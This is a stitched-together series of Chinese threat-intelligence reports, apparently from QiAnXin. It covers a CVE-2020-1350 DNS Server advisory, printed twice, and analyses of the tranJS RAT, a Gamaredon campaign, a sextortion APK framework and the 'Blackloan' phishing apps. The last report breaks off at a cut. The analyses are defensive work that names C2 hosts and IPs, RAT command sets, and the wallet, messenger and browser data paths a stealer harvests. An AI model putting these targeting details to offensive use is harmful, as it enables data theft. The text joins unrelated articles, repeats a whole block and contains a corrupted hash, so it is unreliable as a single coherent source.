文档信息

编号

QiAnXinTI-SV-2020-0013

关键字

DNS Server CVE-2020-1350

创建日期

2020年07月14日

更新日期

2020年07月14日

TLP

WHITE

分析团队

奇安信威胁情报中心红雨滴团队

通告概要

2020年7月14日,在微软每月的例行补丁日当天,修复了一个Window DNS Server中的严重远程代码执行漏洞,该漏洞由于Windows DNS Server未能正确处理特定畸形数据交互,从而导致远程无需验证的攻击者通过利用在本地系统账户下执行任意代码。该漏洞在微软的通告中被定级为可蠕虫化级别,此类型的漏洞在被利用后,往往会导致严重的安全威胁,类似之前被利用来传播WannaCry蠕虫的永恒之蓝漏洞。

 

奇安信威胁情报中心红雨滴团队第一时间跟进了该漏洞,基于所得到的技术细节,该漏洞是由于Windows DNS Server处理畸形回应数据时存在的整数溢出问题,目前红雨滴团队已经验证了此漏洞可被攻击者完全操控触发,存在被大范围攻击利用的可能性。而且漏洞影响从Windows Server 2008到2019的操作系统,几乎涵盖所有相关的Windows服务器。因此,奇安信威胁情报中心提醒启用了Windows DNS Server相关功能的用户及时安装该漏洞的补丁。

漏洞概要

漏洞名称

Microsoft DNS Server执行漏洞(CVE-2020-1350)

威胁类型

远程代码执行

威胁等级

严重

漏洞ID

CVE-2020-1350

利用场景

远程无需验证的攻击者可以通过诱使Windows DNS Server处理特定的畸形数据触发漏洞在服务器上执行任意代码,从而控制服务器系统。

受影响系统及应用版本

产品

平台

Windows DNS Server

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows DNS Server

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows DNS Server

Windows Server 2008 for x64-based Systems Service Pack 2

Windows DNS Server

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows DNS Server

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows DNS Server

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows DNS Server

Windows Server 2012

Windows DNS Server

Windows Server 2012 (Server Core installation)

Windows DNS Server

Windows Server 2012 R2

Windows DNS Server

Windows Server 2012 R2 (Server Core installation)

Windows DNS Server

Windows Server 2016

Windows DNS Server

Windows Server 2016 (Server Core installation)

Windows DNS Server

Windows Server 2019

Windows DNS Server

Windows Server 2019 (Server Core installation)

Windows DNS Server

Microsoft Windows Server version 1903 (Server Core installation)

Windows DNS Server

Microsoft Windows Server version 1909 (Server Core installation)

Windows DNS Server

Microsoft Windows Server version 2004 (Server Core installation)

漏洞描述

该漏洞为Windows DNS server无法正确处理指定请求,攻击者通过向指定的Windows DNS Server发送恶意的DNS畸形请求,将导致远程代码执行。

影响面评估

该漏洞影响几乎全版本的Windows DNS Server,奇安信全球鹰系统总体评估全球受影响服务器在万级,鉴于漏洞本身的严重性,相关使用了Windows DNS Sever的用户需尽快为服务器打上补丁。

处置建议

临时处置措施

针对该漏洞,微软已发布相关补丁更新,见如下链接:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350

对于无法迅速安装补丁的用户,也可以通过设置以下注册表暂时缓解,设置注册表之后重启DNS服务即可生效。

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters

DWORD = TcpReceivePacketSize

Value = 0xFF00

相关补丁安装成功后,删除TcpReceivePacketSize键值即可。

时间线

2020年7月14日

微软发布此漏洞相关的通告。

参考资料

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350

 

文档信息

编号

QiAnXinTI-SV-2020-0013

关键字

DNS Server CVE-2020-1350

创建日期

2020年07月14日

更新日期

2020年07月14日

TLP

WHITE

分析团队

奇安信威胁情报中心红雨滴团队

通告概要

2020年7月14日,在微软每月的例行补丁日当天,修复了一个Window DNS Server中的严重远程代码执行漏洞,该漏洞由于Windows DNS Server未能正确处理特定畸形数据交互,从而导致远程无需验证的攻击者通过利用在本地系统账户下执行任意代码。该漏洞在微软的通告中被定级为可蠕虫化级别,此类型的漏洞在被利用后,往往会导致严重的安全威胁,类似之前被利用来传播WannaCry蠕虫的永恒之蓝漏洞。

 

奇安信威胁情报中心红雨滴团队第一时间跟进了该漏洞,基于所得到的技术细节,该漏洞是由于Windows DNS Server处理畸形回应数据时存在的整数溢出问题,目前红雨滴团队已经验证了此漏洞可被攻击者完全操控触发,存在被大范围攻击利用的可能性。而且漏洞影响从Windows Server 2008到2019的操作系统,几乎涵盖所有相关的Windows服务器。因此,奇安信威胁情报中心提醒启用了Windows DNS Server相关功能的用户及时安装该漏洞的补丁。

漏洞概要

漏洞名称

Microsoft DNS Server执行漏洞(CVE-2020-1350)

威胁类型

远程代码执行

威胁等级

严重

漏洞ID

CVE-2020-1350

利用场景

远程无需验证的攻击者可以通过诱使Windows DNS Server处理特定的畸形数据触发漏洞在服务器上执行任意代码,从而控制服务器系统。

受影响系统及应用版本

产品

平台

Windows DNS Server

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows DNS Server

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows DNS Server

Windows Server 2008 for x64-based Systems Service Pack 2

Windows DNS Server

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows DNS Server

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows DNS Server

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows DNS Server

Windows Server 2012

Windows DNS Server

Windows Server 2012 (Server Core installation)

Windows DNS Server

Windows Server 2012 R2

Windows DNS Server

Windows Server 2012 R2 (Server Core installation)

Windows DNS Server

Windows Server 2016

Windows DNS Server

Windows Server 2016 (Server Core installation)

Windows DNS Server

Windows Server 2019

Windows DNS Server

Windows Server 2019 (Server Core installation)

Windows DNS Server

Microsoft Windows Server version 1903 (Server Core installation)

Windows DNS Server

Microsoft Windows Server version 1909 (Server Core installation)

Windows DNS Server

Microsoft Windows Server version 2004 (Server Core installation)

漏洞描述

该漏洞为Windows DNS server无法正确处理指定请求,攻击者通过向指定的Windows DNS Server发送恶意的DNS畸形请求,将导致远程代码执行。

影响面评估

该漏洞影响几乎全版本的Windows DNS Server,奇安信全球鹰系统总体评估全球受影响服务器在万级,鉴于漏洞本身的严重性,相关使用了Windows DNS Sever的用户需尽快为服务器打上补丁。

处置建议

临时处置措施

针对该漏洞,微软已发布相关补丁更新,见如下链接:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350

对于无法迅速安装补丁的用户,也可以通过设置以下注册表暂时缓解,设置注册表之后重启DNS服务即可生效。

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters

DWORD = TcpReceivePacketSize

Value = 0xFF00

相关补丁安装成功后,删除TcpReceivePacketSize键值即可。

时间线

2020年7月14日

微软发布此漏洞相关的通告。

参考资料

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350

 

近日,奇安信病毒响应中心在日常黑产挖掘过程中发现一个基于脚本的木马架构,该脚本木马最早出现于2018年或更早,至今一直处于活跃状态。同时在日常样本分析过程中我们发现基于脚本的木马架构越来越多,有些未知的木马架构可能已经被用于APT攻击,这引起了我们对这类样本的关注。    

该组织通常会投放带有恶意Lnk的Zip文件,受害者双击Lnk后会释放恶意的JS木马,初次运行时,js木马会读取Lnk中的附加数据,释放诱饵。第二次运行时会实现持久化操作,通过git、reddit等获取远程服务器IP,注册ID号。再次运行时开始执行监控逻辑,从远程服务器接收命令 

样本分析

样本信息如下:

  MD5 Packer/compiler 类型
Patel compliance  documents.zip 3fab9cd9a1da290bdf99256c1f51a4e9 None Zip文件

压缩包内容如下:

四个Lnk释放的JS Rat相同,奇安信新一代反病毒引擎可对Lnk样本进行精确检测

诱饵内容整理如下:

文件名 MD5 Packer/compiler 类型
reportapi.js 3fab9cd9a1da290bdf99256c1f51a4e9 None Zip文件

VT查杀效果如下:

结合js中出现的字符串,我们将该其命名为tranJS Rat,首先会对变量进行初始化,可以看到最新版的版本号为4.0,这说明该JS木马已经存在很长一段时间。

开始运行时会判断路径,并调用FirstTimeRun函数

设置运行目录,从Lnk文件中读取诱饵文件并打开

拷贝到运行目录并再次运行

第二次运行时会从

www.digitalpoint.com/members/bliblobla.943007/

www.reddit.com/user/deltadelta2222/comments/gepb1w/hey/

获取远程服务器的IP地址

访问的页面如下

远程服务器地址:139.28.37.63

之后会执行SecondTimeRun函数

生成media.lnk,通过注册表实现持久化

之后向远程服务器register.php发起中注册请求,生成ID文件,作为受害者标记

第三次运行时会先读取ID文件。

RunSS函数会执行工作目录下的python.exe,该程序可能是后续从远程服务器下载,故暂不清楚其功能

RunLogger函数运行特定目录下的log收集脚本

之后进入Main123Loop死循环函数

向view.php页面发起Post消息,获取CMD命令并执行,调试时服务器返回为空

分别访问send.php和upload.php上传filetoupload.txt和878478ddd3.TMP,

TakeCookies函数会执行特定目录下的ccv.exe收集浏览器Cookie信息,收集完成后向cookies.php页面发起Post上传数据。之后进行sleep操作,每个一段时间执行一次上述操作。

关联分析

通过特征关联,我们找到了该团伙近两年使用的几十个样本,部分整理如下

这些压缩包会挂在Google云盘或者相关服务器上

ITW      
drive.google[.]com/uc?id=1xkf8odEsr4G21zgJK2hiA9s4xJwCunCx&export=download      
doc-14-bo-docs.googleusercontent[.]com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/6eg54kqrjlam0a6qu92jbril13fn0mlo/1565928000000/08856126706763057825/*/1xkf8odEsr4G21zgJK2hiA9s4xJwCunCx?e=download      
185.61.137[.]141/webdav0xx0x00x0/Yussuf.zip      

获取远程服务器的网站页面整理入下:

使用的诱饵类型包括PDF、JPG、PNG、doc

JPG诱饵部分整理如下:

 

PDF诱饵整理如下:

   

Doc诱饵整理如下

关联的大部分Lnk样本的创建时间都为2018-02-13 07:29:00,我们认为这些Lnk文件应该为该团伙的ToolKit生成。

Lnk元数据如下:

   
可以看到有些Lnk样本是在Vmware虚拟机中生成的。MachineID以及Mac地址整理如下

MachineID      
admin-pc      
me-rm-pc      
user-pc      
win-11nvmud2d59      

 

MAC地址      
ac:7d:eb:e8:49:02      
00:50:56:c0:00:08      
00:23:ae:84:a3:9f      
00:24:54:5e:ff:82      

tranJS rat版本迭代

目前我们只捕获到了tranJS rat的V2.8、V3.0、V3.4、V3.5、V3.6、V4.0版本的样本,各版本之间只存在细节的改变,如V2.8版本中存在结束其他的脚本功能

在获取远程服务器的IP地址时通过启动IE来实现

后续像远程服务器发送数据也是通过IE实现

在V3.0版本中,GetCommand函数返回的值也可能是第二阶段的下载地址,ProcessCmd函数实际上实现了下载者的功能,当没有匹配到时才会执行cmd命令,而下载者的功能在V4.0中删除了

在V3.4中才加入了StartLogger函数

进一步对ProcessCmd函数进行了扩充,增加了上传的功能

注册ID时发送的Post数据会带有本机的CPU和用户名信息

V3.5并没有明显的变化,到了V3.6时Process123Cmd函数又新增了退出的功能

MaaS中的一员?

当我们对一个ITW链接(185.61.137[.]141/webdav0xx0x00x0/yussuf.zip)进行关联时发现了一些有趣的样本,同目录下的样本整理如下:

ITW   MD5  
185.61.137[.]141/webdav0xx0x00x0/ccv.exe   7fee8223d6e4f82d6cd115a28f0b6d58  
185.61.137[.]141/webdav0xx0x00x0/x.js   fc0f2042e63aebd9b3aeb639501dd827  
185.61.137[.]141/webdav0xx0x00x0/ccv_old.exe   2f62db1a1f616deabcbe1dda5b17a00b  
185.61.137[.]141/webdav0xx0x00x0/ncat.exe   b6e0db27c2b3e62db616b0918a5d8ed8  
185.61.137[.]141/webdav0xx0x00x0/load.ocx   fcce335ad11f4e568e6fe23ae766b187  
185.61.137[.]141/webdav0xx0x00x0/msfsigned.ocx   d76f443222551edfe07b357c3bb157da  
185.61.137[.]141/webdav0xx0x00x0/msf_64.ocx   b034972a9540b3b00161310f5bf03fc9  

在之前对tranJS rat进行分析时曾经提到过ccv.exe是用来收集浏览器Cookie的程序,tranJS rat刚开始执行时并不释放该程序,后续很有可能从远程服务器下载而来。

经分析,从185.61.137[.]141/webdav0xx0x00x0/这个目录下下载的ccv.exe的确是一款Cookie提取工具,支持/scookiestxt命令输出。

且该目录下的x.js为V3.6版本的tranJS rat,至此我们认为185.61.137[.]141/webdav0xx0x00x0/目录下的部分样本应该为tranJSrat后续执行的内容,185.61.137.141应该为该团伙的资产。当我们对同目录下的load.ocx分析时发现样本由PureBasic编译,编译时间为2020-03-03

load.ocx实际上为臭名昭著的more_eggs(SpicyOmelette)恶意软件

该恶意软件目前由资深MaaS提供商在暗网上售卖,已被Cobalt Gang、Fin6以及其他威胁组织使用,基于现有数据,我们没有发现该团伙的TTP与上述团伙的TTP相重叠的地方,故我们暂且将其命名为一个新的组织Tran Group。

该服务器上还存在64位的签名失效的SpicyOmelette,VT报毒情况如下:

失效数字签名如下:

从导出表可以判断,上述SpicyOmelette家族的dll很有可能被用于Dll-Sideloading

脚本木马攻击愈演愈烈

近期,在高价值样本挖掘过程中我们发现越来越多的组织开始使用脚本木马进行间谍活动。

文件名 MD5 Packer/compiler 类型
Azerbaijan_special.doc ba1618a981f755eb752aa5dc90bd70a4 None doc文件
Azerbaijan_special.doc 3aadbf7e527fc1a050e1c97fea1cba4d None doc文件

团伙使用带有宏恶意文档利用疫情作为诱饵针对阿塞拜疆政府发起攻击,启用宏后才能阅读文档内容。

宏会释放并执行由python编写的木马

释放的相关模块如下

连接远程服务器

支持的命令如下:

命令 功能
version 返回当前版本为4.0
ls 获取指定路径目录,若指定则获取计算机所有目录
cd 改变工作目录
sysinfo 获取系统,计算机名,用户名,版本号,处理器信息
download 从ftp获取文件
upload 上传指定文件
shot 获取屏幕截图并上传
cp 复制文件
mv 移动文件
link 为指定文件创建硬链接
register 创建指定注册表值
hide 将指定文件属性设置为隐藏或不隐藏
compress 将指定文件打包
jobs 进程相关
exit 结束
其他 远程shell

无独有偶,在年初捕获的中东选手的诱饵中也发现了新型的Python Rat

文件名 MD5 Packer/compiler 类型
mofa.docx 7c487d8462567a826da95c799591f5fb None doc文件

诱饵疑似针对阿联酋政府

模板注入从谷歌云盘下载dotm,宏会继续从谷歌云盘下载隐写的图片,解密后执行autoit,下载图片解密释放执行经过pyinstall打包后的Rat

通过Google表单来上传数据

通过Twitter上的内容获取指令

 总结

脚本木马的低可探测性可能是APT组织和黑产团伙对其青睐的原因之一,同时由于脚本之间存在可复用性,会在一定程度上影响安全研究人员溯源的准确性。可以预见未来会有越来越多基于脚本的木马被用于高级威胁对抗的过程中,安全研究人员务必保持警惕,与此同时,奇安信病毒响应中心提醒用户,疫情在家远程办公,不要点击来源不明的邮件和可执行文件,同时提高个人的安全意识,从而可以防止用户隐私信息被盗取的风险,奇安信病毒响应中心会这一趋势进行监控和预警。

同时基于奇安信威胁情报中心的威胁情报数据的全线产品,包括奇安信威胁情报平台(TIP)、天擎、天眼高级威胁检测系统、奇安信NGSOC    等,都已经支持对该家族的精确检测。

IOC

文件Hash:

3fab9cd9a1da290bdf99256c1f51a4e9

3fab9cd9a1da290bdf99256c1f51a4e9

7fee8223d6e4f82d6cd115a28f0b6d58

fc0f2042e63aebd9b3aeb639501dd827

2f62db1a1f616deabcbe1dda5b17a00b

b6e0db27c2b3e62db616b0918a5d8ed8

fcce335ad11f4e568e6fe23ae766b187

d76f443222551edfe07b357c3bb157da

b034972a9540b3b00161310f5bf03fc9

ba1618a981f755eb752aa5dc90bd70a4

3aadbf7e527fc1a050e1c97fea1cba4d

Host:

139.28.37.63

185.62.190.89

185.61.137.141

dellgenius.hopto.org

*参考来源:奇安信威胁情报中心,转载请注明来自FreeBuf.COM    

概述

GamaredonAPT组织是疑似具有东欧背景的APT团伙,该组织攻击活动最早可追溯到2013年,其主要针对乌克兰政府机构官员,反对党成员和新闻工作者,以窃取情报为目的。

根据奇安信红雨滴团队观测从2019年末至今,Gamaredon组织保持高强度的活跃状态,且每次活动都与乌克兰地区的政治以及安全动态有关。2020年1月25日乌克兰安全局宣布在2019年共阻止了482次针对关键基础设施的网络攻击。

在五一假期前后,奇安信红雨滴团队发现Gamaredon组织开始了新活动,在此次活动中,该组织依然使用模板注入的方式从远程服务器下载payload,与以往不同的是本次活动下载的payload为带有cve-2017-11882漏洞的rtf文档,而非以往的带有恶意的宏文档来执行后续代码,由于模板注入免杀效果较好,VT上仅有为数不多的杀软报毒。

样本分析

执行流程如下:

诱饵文档

此次捕获的样本,相关信息如下:

文件名 MD5 模板注入地址 修改时间
Условия создание фрагмента.docx 89d6bbbaa54253f56af8769ed6c1e9ec http://logins.kl.com.ua/sectigoprotect.cer 2020-05-01 22:32:14
Условия.docx e6183f5be1d907fb9a53e08b5c28a9ae http://logins.kl.com.ua/digital.cer 2020-04-28 21:25:24

样本均采用模板注入技术执行后续payload,此方式能起到极好的免杀效果,通过奇安信新一代反病毒引擎可精确检测除模板注入地址:

打开文档后,word会向远程服务器下载恶意的RTF文档并运行:

文档内容如下:

RTF文档信息

文件名 MD5
Digital.cer 63f4f59656bba5cb700f7f252028be7f
SectigoProtect.cer fd1077af257671250e666d07e99565a1

使用11882漏洞,调用CMD向远程服务器发起请求,下载并执行2.msi程序:

恶意Msi

文件名 MD5
2.msi 0fe3f5fbf08c53ee45d8094632dbdb59

Msi的主要功能为Droper释放各个模块:

其中的二进制文件为SFX自解压文件:

在C盘dllbroker目录下释放如下文件:

会先调用WScript.exe执行System.vbe:

文件名 MD5
System.vbe 787ebad76b4f40b4fb19451d17a941cd

内容如下:

在dllbroker目录下生成System.lnk快捷方式指向自身,调用CMD执行Zjv0obArqjtjrdV0Haf0JAmZCyY2Sl.bat

文件名 MD5
Zjv0obArqjtjrdV0Haf0JAmZCyY2Sl.bat 0d3b300ab76a2b9fe092b8e670158216

Bat脚本内容如下:

将本目录下的System.lnk拷贝到启动目录下实现持久化,并运行brokernet.exe程序。

文件名 MD5
brokernet.exe 7df85f5215c5a11c4e2ad007bd5b1571

.net程序加了.NETReactor的壳:

主要功能为后门程序:

读取同目录下的vmcheck32.dll文件,解密C2,并发起请求,vmcheck32.dll内容如下:

Base64解密后如下:

连接远程服务器:

收集本机相关信息如IP地址、硬件信息等:

从远程服务器如下文件:

调用CSC.exe在固定目录下生成可执行文件。

meqbjtdp.cmdline内容如下:

文件名 MD5
dwm.exe fe4e7581f9e3093a5ef528f75e05e1b5
msdtc.exe 37192f9f3d4c05ab38a0eafb297d6e35
svchost.exe ad918fdcece862134a84a21d8abcc63f

可能生成的目录如下:

目录名
C:\Program Files (x86)\Windows Media Player\Skins\
C:\System Volume Information\
C:\Documents and Settings\
C:\Boot\zh-CN\
C:\ProgramData\Favorites\
C:\Windows\tracing\
C:\PerfLogs\Admin\

生成的可执行文件主要功能为启动器,用于启动brokernet.exe。

由于在分析过程中网络连接不稳定导致后续的行为丢失,不管怎么样,这是一个成熟度非常很高的后门,我们将其命名为“BrokerGama”。

关联分析

通过奇安信ALPHA威胁分析平台等内部数据和公开威胁情报信息,我们发现在logins.kl.com.ua域名上还有一个名为4.msi的可执行文件。

文件名 MD5
4.msi b5622716e68468ff38d32ef5f4795a87

里面同样是SFX自解压文件,但是释放的payload却大不相同,在%appdata%目录下释放service文件:

文件名 MD5
service.exe 3973d7da737d0cc7b6b8536f36f0c98a

有趣的是,该Spy类的软件由VC编写。主要功能为窃取相关信息。

截屏保存为screen.jpeg:

遍历Discord\\Local Storage和Authy Desktop\\Local Storage目录下的文件:

判断Telegram是否安装,拷贝tdata目录下的数据:

收集FileZilla相关信息:

寻找Total Commander 文件管理器配置文件:

收集pidgin即时通讯软件相关配置文件:

收集虚拟货币钱包:

相关路径
Ethereum\\keystore
Electrum\\wallets
Electrum-NMC\\wallets
com.liberty.jaxx\\indexedDB
Exodus\\exodus.wallet
Fetch\\Local Storage
Eidoo\\Electron storage
MyCrypto\\Local Storage
Bitcoin\\wallets
Coinomi\\wallet
Guarda\\Local Storage
Peercoin\\wallets
Monero\\wallets
.bitpay\\app\\Local Storage

收集steam相关文件:

获取本机相关信息:

获取NordVPN.exe和ProtonVPN.exe相关文件,以及获取浏览器存储的账号密码:

获取浏览器的相关记录:

之后将上述数据打包成zip文件发送给远程服务器:

IP地址:193.109.84.21,

打包后的内容如下:

基于样本中出现的字符串,我们将此类样本命名为“grbrSpy”。

通过对Gamaredon APT组织最近两个月的样本进行归类,我们猜测该行动应该是在二月份谋划,三月份实施攻击一直持续到现在。

文件名 MD5
BILATERAL COOPERATION PLAN.DOCX b8bee6cba4ec62b05bacbd5b6e79cf94
BILATERAL COOPERATION PLAN.DOCX b99dceea34d883db0ba4db7d626b11c2
OSCE.docx 7ef3d61b6e56de27c689c668b4688414
2ce959b961c81e34f4d4ccb4a23fab5b.zip 2ce959b961c81e34f4d4ccb4a23fab5b
OSCE.docx 6928b6c0da32bfd34a837dafd42b3abe
OSCE.docx 4da1af09833868e013e02add23e59957
Project TIKA in Ukraine.docx 7cdf57c02f50e6477452678d3023cdb8
Запит на iнформацiю.docx 2147f94942593ef3473ea00c83c2267d
OSCE.docx b54ad8e721a2c8175daa357dc9252103
Р’iтання РЎР‘РЈ.docx c047dd99d3658e5df1d0f14f0beb7917
Вiтання СБУ.docx b6e30ea779ab250032fb7f3c2c493778
Р’iтання РЎР‘РЈ.docx 971c53db7f875a1008995b0397cba489
21-540-0215.docx 7ed9035341a1906ff731236633b8d911
Запит на iнформацiю.docx 8aeba52be05a59306e54ef9baa917658
Contacts of the embassy.docx 7219192d3fce7a1b2a0b6320da6cc4a3
Embassy of Ukraine in Hungary.docx 6885d6b44be537824377b74b63534d82
21-540-0215.docx 9786a23382b5d7ed1f1f8d640cfc82b5
Посольство України в Угорщині.docx ffa2fc9b24b87b6eead448641eb1eee8
Посольство УкраїнивУгорщині.docx 3352636bdec80c3a6876d09cb043aa9d
PROJECT.DOCX 3140e5c776400c841efbc79b85bf245a
PROJECT.DOCX d10c70f8eef196e148fea275230de1d9
PROJECT.DOCX 9afe18faeb125c1bd70d3***6d1397aa
contact.docx 27a70ddc4e1626792b71e12b54af9666
email.docx 521bf37724aa2bef9ffd4ceb910c8a2a
20200420_TATB.docx 67735f22639a5a8bc13d811eba88fbe3
Условия.docx e6183f5be1d907fb9a53e08b5c28a9ae
Условия рекламной интеграции.docx d8d285b34e588a12d946828c5c097ec3
Conditions.docx 5616b794188223d5cd567fdd91ce676b
Условия создание фрагмента.docx 89d6bbbaa54253f56af8769ed6c1e9ec

部分诱饵截图如下:

上述所有样本创建时间均为2020-02-25 05:41:00,且文档的元数据有相似之处:

Creator均为“DESKTOP-”开头,我们推测这些模板注入的样本为该团伙的ToolKit生成,在该团伙早期的样本中同样存在该现象:

同时当我们对上述brokernet.exe,也就是“brokerGama”家族的样本进行关联时发现了大量的相似样本,集中出现在4月份初,伪装成各式各样的软件。

通过VT_RedDrip的沙箱可以看到这类样本的行为和上述分析一致:

有些样本在dclib目录下带有反虚拟机模块:

总结

2020年以来,疫情肆虐全球,同时网络空间的攻击活动也越发频繁,近期,东欧形势备受关注,而具有该国背景的APT组织近期也活动频繁。

奇安信红雨滴团队提醒广大用户,切勿打开社交媒体分享的来历不明的链接,不点击执行未知来源的邮件附件,不运行夸张的标题的未知文件,不安装非正规途径来源的APP。做到及时备份重要文件,更新安装补丁。

若需运行,安装来历不明的应用,可先通过奇安信威胁情报文件深度分析平台(https://sandbox.ti.qianxin.com/sandbox/page)进行简单判别。目前已支持包括Windows、安卓平台在内的多种格式文件深度分析。

IOC

MD5

89d6bbbaa54253f56af8769ed6c1e9ec

e6183f5be1d907fb9a53e08b5c28a9ae

0fe3f5fbf08c53ee45d8094632dbdb59

787ebad76b4f40b4fb19451d17a941cd

0d3b300ab76a2b9fe092b8e670158216

7df85f5215c5a11c4e2ad007bd5b1571

fe4e7581f9e3093a5ef528f75e05e1b5

37192f9f3d4c05ab38a0eafb297d6e35

ad918fdcece862134a84a21d8abcc63f

b5622716e68468ff38d32ef5f4795a87

3973d7da737d0cc7b6b8536f36f0c98a

C2

logins.kl.com.ua

netskacm.mcdir.ru

193.109.84.21:80

*本文作者:奇安信威胁情报中心,转载请注明来自FreeBuf.COM

概述

近日,奇安信病毒响应中心在日常黑产挖掘过程中发现有人以裸聊的形式在社交网络上传播某种视频直播软件,该软件在提供正常直播内容的同时还会在暗地里收集用户数据,而受害者往往控制不住自己的欲望,导致个人信息被泄露,严重的甚至被敲诈钱财。

该APK样本经过加固,输入手机号和正确的推广码后才会执行恶意代码将相关信息上传到服务器上。所以该样本免杀效果非常好,很难被探测到,经过后续扩展发现这是一套完整的裸聊诈骗框架,已经被大量的黑产团伙使用。

通过奇安信大数据平台监测,已有群众中招,为防止威胁进一步扩散,病毒响应中心负责任地对相关样本进行披露和分析。

背景

近几年,随着多种新型网络诈骗兴起,前有博彩杀猪盘在东南亚搞的风生水起,后有网贷,校园贷在内地危害人间,造成了当事人倾家荡产、自杀等人间惨剧,严重影响了社会秩序。而本文让我们来聊一聊裸聊与诈骗。

任何事物都会不断的发展进化,以适应当下的环境,裸聊也不例外。早期裸聊的形式较为简单,黑产团伙建立色情站点,会先通过“试聊”的方式消除用户的顾虑,几分钟后弹出对话框提示“账户余额不足”需要充值才能继续聊天,之后还会提供VIP会员服务,加入VIP后可以享受女主播一对一裸聊服务和上门服务。

早期的传播方式也较为单一,大部分都为导航站网页弹框,或者一些国产流氓软件弹出每日资讯中的内容。

到了2019年黑产们改进了裸聊的形式,并结合大火的“杀猪盘”模式,从原来只弹框的被动接触,变成了现在的主动和被动相结合的形式,主动在社交网络上与你发起会话进行聊天,使用相关《话术》诱导你进行裸聊,上钩之后会发你app的下载二维码以及对应的邀请码。

裸聊App会获取你的通讯录并录制裸聊时的视频,裸聊结束后会对你进行恐吓和勒索。

大部分受害者都会乖乖付款,花钱消灾:

推广方面,与搞引流的黑产合作已经是常态,同时在社交平台上收集目标男性的QQ号主动出击,提高成功率。

最近我们发现黑产开始推广“用户激励政策”,介绍裸聊平台给认识的人,邀请成功后“返利”。

样本分析

文件名  MD5   类型
邂逅.APK d7be150461334e178ec4134dfe9bfc3f APK文件

App运行界面如下:

执行过程中会获取本机详细信息

监听短信消息

定位功能

录音和相机功能

输入手机号和对方提供的邀请码。

向远程服务器发起请求,js代码会先校验手机号和邀请码。

会根据不同的操作系统申请权限

获取通讯录

获取位置信息

最后将上述信息上传到远程服务器

APP还会提供正常的直播功能

在服务器后台我们能够看到已经有人中招。

经过研判应该为真实数据

关联分析

分析样本的过程中发现一些注释引起了我们的注意:

这些注释不像是攻击者编写,我们更倾向于是开发者的笔记,攻击者魔改后用于裸聊诈骗,基于上述思路,我们找到了该裸聊框架的源码。

尚不清楚源代码公开的原因,源码出现的时间与奇安信大数据监测到的访问数据相吻合,都为四月初。

源码中附带安装教程,非常详细:

目前我们已经监控到有人拿着这套源码在相关平台上进行贩卖,且已经有大量的黑产团伙使用这套源码进行诈骗。

总结

随着诈骗团伙的手段不断升级,可以预见未来会有越来越多的诈骗形式被开发出来,安全研究人员务必做好长期对抗的准备。从预防的角度来讲,大多数诈骗都是利用人性的欲望来进行诱导的,因此,洁身自好,不贪图小便宜,培养风控意识能在很大程度上防范当今的诈骗,从安全的角度来讲,不要点击来源不明的邮件和可执行文件,同时提高个人的安全意识,也能阻止诈骗活动的展开。奇安信病毒响应中心会持续对国内黑产进行挖掘和跟踪。

同时基于奇安信威胁情报中心的威胁情报数据的全线产品,包括奇安信威胁情报平台(TIP)、天擎、天眼高级威胁检测系统、奇安信NGSOC等,都已经支持对该家族的精确检测。

IOC

文件Hash:

d7be150461334e178ec4134dfe9bfc3f

*本文作者:奇安信威胁情报中心,转载请注明来自FreeBuf.COM

背景介绍

近期奇安信病毒响应中心在日常监测中,发现了一批针对中国、越南、马来西亚等国用户的钓鱼APP。该类钓鱼APP主要通过仿冒正规APP诱骗用户下载使用,通过仿冒的钓鱼页面,诱骗用户填写相关的个人银行·卡信息,从而达到窃取用户账户信息,进而达到窃取用户财产的目的。

经过分析发现,该类恶意软件最早出现在2020年2月26日,且目前APP包名比较随意大多为“com.loan.test1”,因此我们将该类银行钓鱼APP命名为“Blackloan”。迹象表明,Blackloan目前只是测试样本,后续可能还会进行更新。通过相关的关联分析, Blackloan很有可能为新的电信诈骗团伙。

针对国内的钓鱼攻击

Blackloan目前在国内主要通过仿冒“Visa”与“安全防护”APP进行传播,通过仿冒抽奖、中奖等钓鱼图片,诱骗用户填写敏感的个人信息。Visa虽然为美国信用·卡,但在国内有大量的用户群体,所以潜在影响比较大,目前已有国内用户中招。

ViSA相关信息:

Blackloan仿冒Visa针对国内用户钓鱼页面:

通过钓鱼页面,诱骗用户填写个人银行·卡信息,如果用户进行了填写,会上传用户个人信息到指定的服务端。

对用户可能持有的银行·卡都做了相应的钓鱼页面:

仿冒最高人民检察院的图标:

针对越南的钓鱼攻击

Blackloan主要通过仿冒越南公安的APP进行钓鱼攻击,通过钓鱼页面诱骗用户填写敏感的个人信息,上传到服务端后并进行后续攻击。

仿冒越南公安部页面:

通过钓鱼页面,诱骗用户填写个人信息:

针对马来西亚的钓鱼攻击

Blackloan主要通过仿冒马来西亚国家银行APP进行钓鱼攻击,通过钓鱼页面诱骗用户填写敏感的个人信息,上传到服务端后并进行后续攻击。

仿冒马来西亚国家银行页面:

通过钓鱼页面,诱骗用户填写个人信息:

样本分析

行为描述

此次我们共发现Blackloan恶意APP 26个,包括其最早期的测试样本,其代码框架及代码功能都相同。都是以钓鱼为主,后台获取用户信息,跟进进行后续操作。

Blackloan运行后,通过相应的钓鱼页面诱骗填写个人信息,当用户填写个人信息后,信息会被传送到指定服务器。恶意程序会后台获取并上传用户手机短信、手机联系人、手机号码、手机固件信息、地理位置等,并可使用用户手机发送指定短信等,以便进行更深入的恶意操作,达到窃取用户财产的目的。

我们对样本进行举例分析:

应用名 Visa Master
包名 com.sample.sample1
